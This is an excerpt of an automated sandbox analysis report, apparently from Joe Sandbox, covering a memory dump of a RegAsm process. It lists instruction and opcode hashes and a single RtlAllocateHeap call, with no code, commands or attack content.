                                                                                                                                                                          • Instruction ID: 154aceb0a70e2b1c6176248329647f15dfba9260395587bf241fc84468e2c486
                                                                                                                                                                          • Opcode Fuzzy Hash: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
                                                                                                                                                                          • Instruction Fuzzy Hash: E501693050C250DBD301AF18E958A0ABBF4EF4AB02F454C68E4C49B362D33ADD24CB9A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 394 443142-443152 RtlAllocateHeap
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00443148
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                          • Instruction ID: f2ee8ec3101e335420bd073388b79e1bdf2823782e18275de44ef30affdbbf4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3CB012300401209BC5141B05FC09F823F209F40661F110060F004480F2C15189A5C5E8